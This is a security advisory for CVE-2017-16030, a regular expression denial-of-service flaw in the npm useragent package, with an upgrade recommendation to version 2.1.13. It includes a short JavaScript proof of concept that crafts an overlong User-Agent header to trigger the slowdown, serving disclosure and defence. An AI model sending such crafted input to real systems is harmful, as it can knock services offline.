GHSA-pjmx-9xr3-82qr
Suggest an improvement- Source
- https://github.com/advisories/GHSA-pjmx-9xr3-82qr
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-pjmx-9xr3-82qr/GHSA-pjmx-9xr3-82qr.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-pjmx-9xr3-82qr
- Aliases
-
- CVE-2017-16030
- Published
- 2018-07-24T19:59:13Z
- Modified
- 2023-11-08T03:59:00.619293Z
- Summary
- ReDoS via long UserAgent header in useragent
- Details
-
Affected versions of
useragentare vulnerable to regular expression denial of service when an arbitrarily longUser-Agentheader is parsed.Proof of Concept
var useragent = require('useragent'); var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP'; var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n'; console.log(useragent.parse(request));Recommendation
Update to version 2.1.13 or later.
- Database specific
{ "nvd_published_at": null, "github_reviewed_at": "2020-06-16T21:49:26Z", "github_reviewed": true, "severity": "HIGH", "cwe_ids": [ "CWE-400" ] }- References
Affected packages
npm / useragent
Package
- Name
- useragent
- View open source insights on deps.dev
- Purl
- pkg:npm/useragent